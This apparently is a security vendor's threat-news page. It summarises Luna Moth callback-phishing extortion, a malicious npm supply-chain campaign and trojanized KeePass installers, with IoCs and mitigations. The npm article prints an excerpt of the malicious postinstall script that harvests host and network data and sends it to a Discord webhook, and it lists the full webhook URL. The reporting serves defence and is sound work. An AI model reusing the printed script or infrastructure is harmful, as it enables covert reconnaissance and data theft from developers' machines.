company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Bulk IP/Domain Lookup

Threatspy

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO

Application Security Engineer

DevsecOps Engineer

IT Manager

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Exploit

loading..
loading..
loading..

Google Chrome Faces Active Exploitation of Critical Vulnerability

Chromium embedded in apps (e.g., Electron-based tools like Slack or Discord) faces compounded risks. “Every unpatched Chromium instance is a potential entry poi...

23-May-2025
5 min read

No content available.

Related Articles

loading..

Social Engineering

Callback

Silent Ransom Group (Luna Moth) targets US law firms via social engineering, dat...

The **Silent Ransom Group (SRG)**, also tracked as **Luna Moth**, **Chatty Spider**, and **UNC3753**, is a cybercriminal syndicate specializing in **data exfiltration extortion**. Emerging from the remnants of the [Conti ransomware](https://www.secureblink.com/cyber-security-news/lock-bit-ransomware-new-encryptor-and-impact-on-the-derivatives-trading-market) group in March 2022, SRG has refined its focus on **social engineering**, **callback phishing**, and **legitimate tool abuse** to steal sensitive data from high-value targets, primarily U.S. law firms and financial institutions. Unlike traditional ransomware actors, SRG avoids encryption, instead leveraging stolen data for **multi-million-dollar extortion demands** ($1M–$8M). This report provides an exhaustive analysis of SRG’s tactics, operational infrastructure, and actionable defense strategies. ## **Background and Evolution** ### **Origins and Splintering from Conti** - **Conti Syndicate Roots**: SRG members originated from the Conti ransomware operation, a prolific Russian-aligned group linked to **BazarCall** campaigns and **Ryuk/Conti** ransomware deployments. - **Post-Conti Shutdown (March 2022)**: After Conti disbanded due to internal leaks and law enforcement pressure, SRG formed as an independent entity, retaining Conti’s social engineering expertise but pivoting to **pure data extortion**. ### **Campaign Timeline** - **2022**: Initial campaigns focused on **BazarCall**-style callback phishing to deploy ransomware. - **2023**: Shift to **data theft extortion**, targeting legal/financial sectors. - **2024**: Expansion of **typosquatted domain registrations** and RMM tool abuse. ## **Operational Framework** ### **Core Objectives** - **Data Exfiltration**: Steal sensitive documents (client contracts, financial records, litigation details). - **Psychological Extortion**: Pressure victims via phone calls, emails, and threats of data leaks. - **Profit Maximization**: Tailor ransom demands to victim revenue (1–8% of annual income). ### **Tactics, Techniques, and Procedures (TTPs)** Aligned with **MITRE ATT&CK Framework**: | **Phase** | **Tactics** | **Tools/Techniques** | |-------------------------|-----------------------------------------------------------------------------|-------------------------------------------------------------------------------------| | **Initial Access** | Callback phishing, typosquatted domains, fake IT support impersonation | Spoofed emails, fake helpdesk portals, VoIP calls | | **Execution** | Social engineering to install RMM software (e.g., AnyDesk, TeamViewer) | Malicious links to fake IT support sites, PowerShell scripts | | **Persistence** | Minimal; focuses on rapid data exfiltration | Legitimate RMM tools, scheduled tasks | | **Privilege Escalation**| Limited; exploits default user permissions | Credential harvesting via keyloggers, browser data extraction | | **Exfiltration** | Uses WinSCP (SFTP) and Rclone (cloud sync) | Data staged in compressed archives, exfiltrated via HTTPS/SSH | | **Impact** | Extortion via threats to leak/sell data, direct phone calls to executives | Dedicated leak site (rarely updated), follow-up harassment | ## **Attack Lifecycle Deep Dive** ### **Stage 1: Reconnaissance and Impersonation** - **Typosquatting Domains**: Registrations mimicking major U.S. law firms (e.g., `sullivancromwell-support[.]com` vs. legitimate `sullivancromwell.com`). - **Phishing Lures**: Emails impersonating IT departments with urgent requests (e.g., “Your account will be locked within 24 hours – call [spoofed number]”). ### **Stage 2: Callback Phishing and RMM Deployment** - **Social Engineering Playbook**: 1. Victim calls fake helpdesk number provided in phishing email. 2. Attackers pose as IT staff, convincing target to visit a typosquatted domain. 3. Victim downloads “critical security updates,” which are disguised RMM tools. - **RMM Abuse**: Tools like **Splashtop** or **ScreenConnect** grant persistent remote access. ### **Stage 3: Data Hunting and Exfiltration** - **Rapid Triage**: Attackers spend 2–4 hours per compromised device: - Search for keywords: “confidential,” “merger,” “tax,” “client.” - Target shared drives (e.g., `\\NAS\legal_docs`). - **Exfiltration Methods**: - **WinSCP**: Uploads to attacker-controlled SFTP servers. - **Rclone**: Syncs data to cloud storage (Mega.nz, Dropbox). ### **Stage 4: Extortion and Negotiation** - **Ransom Notes**: Sent via email/Tor payment portals, threatening to: - Auction data on dark web forums. - Contact clients/partners with stolen documents. - **Call-Based Pressure**: Attackers phone employees directly, impersonating executives or legal advisors to accelerate payments. ## **Target Analysis** ### **Sector Focus** - **Law Firms**: High-value due to sensitive case files, client privileged communications, and financial transaction records. - **Financial Services**: Targets include hedge funds, accounting firms, and investment banks. ### **Victimology** - **Geographic Focus**: 85% of victims in the U.S., with clusters in New York, Washington D.C., and California. - **Size**: Mid-sized firms (50–500 employees) lacking mature SOC capabilities. ## **Mitigation Strategies** ### **Technical Controls** - **Block RMM and Unauthorized Tools**: - Use application allowlisting to block unauthorized RMM software. - Monitor for processes like `winscp.exe` or `rclone.exe` in non-admin contexts. - **Network Segmentation**: - Isolate sensitive data repositories (e.g., legal case files) with strict access controls. - Deploy microsegmentation to limit lateral movement. - **Detect Exfiltration Signatures**: - Flag large outbound transfers (>10GB) via SFTP/HTTPS. - Use DLP solutions to block unauthorized uploads to cloud storage. ### **Human-Centric Defenses** - **Phishing Simulations**: Train employees to: - Recognize typosquatted domains (e.g., “sullivancromwel.com”). - Verify IT requests via secondary channels (e.g., Slack, in-person). - **Callback Phishing Response Protocol**: - Mandate that all IT support requests originate from internal ticketing systems. - Use VoIP call filtering to block spoofed numbers. ### **Incident Response Preparation** - **Pre-Negotiation Planning**: Designate legal/cyber insurance teams to handle extortion communications. - **Backup and Recovery**: - Maintain air-gapped, encrypted backups tested quarterly. - Implement versioning to recover from data corruption. ## **SRG Attack on a U.S. Law Firm** ### **Attack Timeline** - **Day 1**: Phishing email sent to paralegal: “Urgent: Your Microsoft 365 license has expired.” - **Day 2**: The paralegal calls a fake helpdesk and installs AnyDesk. - **Day 3**: Attackers exfiltrate 2TB of merger/acquisition documents via Rclone. - **Day 5**: Ransom note demands $5.2 million. ### **Lessons Learned** - **Failure Points**: Lack of MFA on RMM tools, no network segmentation for client data. - **Post-Incident Actions**: Implemented Zero Trust access controls and quarterly phishing drills. ## **Legal and Regulatory Implications** - **GDPR/CCPA Compliance**: Breached firms face fines for failing to protect client data. - **Ethical Obligations**: Law firms are required to disclose breaches to clients under the ABA Model Rules.

loading..   24-May-2025
loading..   5 min read
loading..

Data Wiper

Info Stealer

Massive npm supply chain attack exposed, 60+ malicious packages steal hostnames,...

A sophisticated supply chain attack targeting the npm ecosystem has been uncovered by Socket’s Threat Research Team, involving 60 malicious packages that stealthily collect sensitive host and network data from developer machines and CI/CD pipelines. The campaign, active since May 12, 2024, uses typosquatted package names and post-install scripts to exfiltrate critical reconnaissance data to a Discord webhook controlled by threat actors. Despite being reported to npm, all packages remain live at the time of writing, with cumulative downloads surpassing 3,000. ### **Campaign Overview** #### **Key Details** - **Scope**: 60 packages published across three npm accounts (`bbbb335656`, `sdsds656565`, `cdsfdfafd1232436437`), each linked to sequential Gmail addresses (`npm9960+1@gmail[.]com`, etc.). - **Timeline**: First package uploaded on May 12; the most recent appeared hours before Socket’s disclosure, signaling an ongoing operation. - **Targets**: Windows, macOS, and Linux systems, including developer workstations and CI/CD nodes. - **Objective**: Reconnaissance to map internal networks, link private environments to public infrastructure, and prepare for future intrusions. #### **Attack Workflow** 1. **Infection**: Developers install malicious packages via typosquatted names (e.g., `react-xterm2` vs. legitimate `react-xterm`). 2. **Post-Install Execution**: A script embedded in `package.json` triggers automatically during `npm install`. 3. **Data Harvesting**: Collects hostnames, internal/external IPs, DNS servers, usernames, and directory paths. 4. **Sandbox Evasion**: Aborts execution in environments linked to AWS, GCP, or research labs (e.g., `compute.amazonaws.com`, `LD.local`). 5. **Exfiltration**: Sends JSON payloads to a Discord webhook, enabling real-time tracking of victims. ### **Technical Deep Dive** #### **Malicious Code Analysis** The script, identical across all 60 packages, leverages Node.js modules (`os`, `dns`, `https`) to gather intelligence: ```javascript const os = require("os"); const dns = require("dns"); const https = require("https"); // Collect internal IPs and hostnames function getIPAddress() { const networkInterfaces = os.networkInterfaces(); // ... iterates NICs to find non-internal IPv4 addresses } // Fetch external IP and ISP details via ipinfo.io function getExternalIP(cb) { https.get('https://ipinfo.io/json', (res) => { ... }); } // Evade sandboxes if (externalHost.includes("compute.amazonaws.com") || homedir.match(/mal_data/i)) { return; } // Exfiltrate to Discord const webhookURL = "hxxps://discord[.]com/api/webhooks/1330015051482005555/..."; https.request(webhookURL, ...).write(trackingData); ``` #### **Data Exfiltrated** - **Host Details**: `os.hostname()`, `os.userInfo().username`, `os.homedir()`. - **Network Intelligence**: Internal/external IPs, DNS servers (`dns.getServers()`), ISP metadata (from `ipinfo.io`). - **Project Context**: `package.json` name, version, installation path (`__dirname`). #### **Evasion Techniques** The script avoids analysis environments by checking: - Cloud provider DNS strings (AWS, GCP). - Lab-related hostnames (e.g., `LD.local`). - Usernames or directories linked to research (e.g., `malicious`, `justin`). ### **Indicators of Compromise (IoCs)** #### **Malicious Packages** | **npm Account** | **Packages** (20 each) | |------------------------|--------------------------| | `bbbb335656` | `seatable`, `hermes-inspector-msggen`, `flipper-plugins`, `e-learning-garena`, `credit-risk` | | `sdsds656565` | `react-xterm2`, `datamart`, `garena-admin`, `coral-web-be`, `kyutai-client` | | `cdsfdfafd1232436437` | `seamless-sppmy`, `netvis`, `mbm-dgacha`, `gunbazaar`, `dof-ff` | *[Full list of 60 packages](#iocs) available in Appendix.* #### **Infrastructure** - **Discord Webhook**: `hxxps://discord[.]com/api/webhooks/1330015051482005555/5fll497pcjzKBiY3b_oa9YRh-r5Lr69vRyqccawXuWE_horIlhwOYzp23JWm-iSXuPfQ` - **External Service**: `ipinfo.io/json` (to geolocate victims). ### **MITRE ATT&CK Mapping** | **Tactic** | **Technique** | **Details** | |---------------------------|-----------------------------------------------|----------------------------------------------| | **Initial Access** | T1195.002 (Compromise Software Supply Chain) | Typosquatted npm packages. | | **Execution** | T1059.007 (JavaScript Execution) | Post-install script triggered by `npm install`. | | **Exfiltration** | T1567.004 (Exfiltration Over Webhook) | Data sent to Discord. | | **Reconnaissance** | T1590.005 (IP Addresses), T1590.002 (DNS) | Harvests internal/external IPs and DNS. | | **Defense Evasion** | T1497 (Virtualization/Sandbox Evasion) | Skips execution in cloud/sandbox environments. | ### **Implications and Risks** #### **1. Supply Chain Vulnerabilities** - **CI/CD Exposure**: Compromised build servers leak internal registry URLs, paving the way for dependency confusion attacks. - **Network Mapping**: Internal IPs and DNS data enable threat actors to chart network topology for lateral movement. #### **2. Future Attack Scenarios** - **Targeted Ransomware**: Mapped networks could face tailored ransomware or data-wiper attacks. - **Credential Theft**: Exposed project paths and usernames facilitate phishing and social engineering. #### **3. npm Ecosystem Weaknesses** - **Delayed Takedowns**: Despite reports, npm has yet to remove packages, highlighting response gaps. - **Post-Install Script Risks**: npm allows unrestricted use of install hooks, a frequent abuse vector. ### **Expert Insights** **Socket’s Threat Research Team**: > _“This campaign isn’t just stealing data—it’s laying the groundwork for precision strikes. By knowing which developers use which tools, attackers can craft convincing spear-phishing lures or sabotage CI/CD pipelines.”_ > _“Discord’s API is increasingly abused for low-cost, high-reward data exfiltration. Unlike traditional C2 servers, webhooks blend into legitimate traffic, evading detection.”_ ### **Mitigation Strategies** #### **For Developers** 1. **Audit Dependencies**: ```bash npm ls --all # Check nested dependencies ``` Cross-reference projects against the [IoCs list](#iocs). 2. **Disable Install Scripts**: ```bash npm config set ignore-scripts true ``` 3. **Use Lockfiles**: Enforce `package-lock.json` to prevent dependency hijacking. #### **For Organizations** - **Deploy Dependency Scanning**: Tools like **Socket** or **Snyk** flag malicious patterns (e.g., DNS/IP harvesting). - **Harden CI/CD**: - Restrict outbound traffic to block Discord webhooks. - Use ephemeral build environments to limit data exposure. - **Network Segmentation**: Isolate developer machines from critical infrastructure. #### **For npm** - **Mandate 2FA for Publishers**: Prevent disposable account abuse. - **Automated Script Analysis**: Scan packages for risky hooks pre-publication.

loading..   24-May-2025
loading..   5 min read
loading..

BlackCat

Malvertasing

Trojanized KeePass installers to deploy Cobalt Strike beacons, steal credentials...

A sophisticated, long-running campaign leveraging **trojanized KeePass installers** to deploy **Cobalt Strike beacons**, steal credentials, and execute ransomware has been linked to **Black Basta** and **BlackCat/ALPHV ransomware affiliates**. The campaign, active for **8+ months**, exploits malvertising, code-signing abuse, and open-source software trust to breach networks. ### **Key Campaign Updates** 1. **Malware Evolution**: - **KeeLoader** (trojanized KeePass) now includes **five distinct variants** (July 2024–February 2025) with iterative improvements: - **Direct credential exfiltration** → **Local credential storage** → **Cobalt Strike integration**. - Signed with **legitimate/revoked certificates** from entities like *S.R.L. INT-MCOM* and *Shenzhen Kantianxia Network Technology Co.*. - **Defense evasion**: Code obfuscation (e.g., typos like `Todway` for `ToArray`), encrypted payloads (RC4), and sandbox-aware execution (triggers only after KeePass database access). 2. **Infrastructure Expansion**: - **Malvertising Domains**: - `aenys[.]com` hosts **subdomains impersonating** WinSCP, Sallie Mae, Phantom Wallet, and cryptocurrency platforms. - Redirects via typosquatting domains (e.g., `keeppaswrd[.]com`, `keegass[.]com`). - **Cobalt Strike C2**: - `arch-online[.]com`, `alcmas[.]com` (watermark **1357776117**), and `1ba8d063-0[.]1b-cdn[.]net` (watermark **678358251**). 3. **Attribution Insights**: - **Moderate Confidence**: Activity overlaps with **UNC4696**, a threat actor linked to **Nitrogen Loader** campaigns (historically tied to BlackCat/ALPHV). - **Black Basta Connections**: Cobalt Strike watermark **1357776117** is uniquely tied to Black Basta IABs. - **Ransom Note Anomaly**: Spoofs Akira ransomware but uses a **Session ID** matching a KeeLoader SHA256 hash, suggesting hybrid tactics. ### **MITRE ATT&CK TTP Mapping** | **Tactic** | **Technique** | **ID** | **Example** | |----------------------|-------------------------------------------------------------------------------|----------------|-----------------------------------------------------------------------------| | **Initial Access** | Drive-by Compromise via Malvertising | T1189 | Bing/DuckDuckGo ads redirecting to `keeppaswrd[.]com`. | | **Execution** | User Execution of Trojanized KeePass Installer | T1204.002 | Victims run `KeePass-2.56-Setup.exe`, believing it legitimate. | | **Persistence** | Registry Run Keys (`HKCU\...\Run\Keepass`) | T1547.001 | Auto-launches malicious `ShInstUtil.exe`. | | **Credential Access**| Exfiltrate KeePass Databases as Cleartext CSV (`%localappdata%\<RANDOM>.kp`) | T1555.005 | Code modifies KeePass to export credentials on database access. | | **Lateral Movement** | SMB/Windows Admin Shares for Cobalt Strike Beacon Propagation | T1021.002 | Drops `cupdater.csproj` (Cobalt Strike) via SMB port 445. | | **Impact** | VMware ESXi Server Encryption | T1486 | Ransomware targets ESXi datastores; Veeam backups destroyed pre-encryption. | ### **Critical Indicators of Compromise (IoCs)** **Domains**: - `aenys[.]com` (malvertising hub), `keeppaswrd[.]com`, `lvshilc[.]com`, `arch-online[.]com`, `alcmas[.]com`. - Subdomains: `salliemae-com-login[.]aenys[.]com`, `winscp-net-download[.]aenys[.]com`. **Files**: - **KeePass Installers**: - `KeePass-2.56-Setup.exe` (SHA256: `0000cf6a3c7f7eebc0edc3d1e42e45debb675e57d6fc1fd96995269db1b44b3`). - `KeePass-2.57-Setup.exe` (SHA256: `0e5199b978ae9816b04d093776b6699b660f502445d5850e88726c05e933e7d8`). - **Cobalt Strike Payloads**: - `db.idx` (masquerades as JPG; RC4-encrypted with `--update` key). **Certificates**: - **Thumbprints**: `467c6c43e6fbbl7fcaefb46fc41a6b2b829e0efa`, `2CF75DAE1A87CA7962CAF67E7310420BBBC30588`. - **Signers**: *S.R.L. INT-MCOM*, *Shenzhen Kantianxia Network Technology Co., Ltd.* --- ### **Mitigation & Detection Strategies** 1. **Block Malicious Infrastructure**: - Add IoC domains (e.g., `aenys[.]com`, `keeppaswrd[.]com`) to network blocklists. - Monitor for connections to C2 IPs: `89.35.237[.]180`, `1ba8d063-0[.]1b-cdn[.]net`. 2. **Hunt for Artifacts**: - Detect `.kp`/`.ks` files in `%localappdata%` with randomized filenames (e.g., `437.kp`). - Flag processes spawning `ShInstUtil.exe` with `--update` arguments. 3. **Verify Software Integrity**: - Download KeePass **only from** [keepass.info](https://keepass.info) (SourceForge). - Validate checksums and certificates against known-good versions. 4. **Ransomware Preparedness**: - Isolate ESXi servers and enforce MFA for administrative access. - Regularly audit backup systems (e.g., Veeam) for tampering. ### **Implications & Attribution** - **Evolving Tradecraft**: Threat actors now **modify open-source codebases** (KeePass) rather than sideloading malware, increasing stealth. - **Ransomware-as-a-Service (RaaS)**: Links to Black Basta and Nitrogen Loader highlight a **converging criminal ecosystem** where IABs and affiliates share infrastructure/tools. - **Adversary Resilience**: Despite Black Basta’s decline, affiliated IABs continue operations, underscoring the need to target **root infrastructure** (malvertising domains, bulletproof hosting).

loading..   22-May-2025
loading..   3 min read
Company Logo
logo

Secure Blink automates the web application and API security for developers and security teams, helping them to rapidly identify and mitigate vulnerabilities more effectively than they can today.

Find Us Online

LinkedIn Logo
Twitter Logo
Discord Logo
Telegram Logo
YouTube Logo
contact@secureblink.com

contact@secureblink.com

@ Copyright 2025 Secure Blink. All rights reserved.

16192, Coastal Highway, Lewes, Delaware, US-19958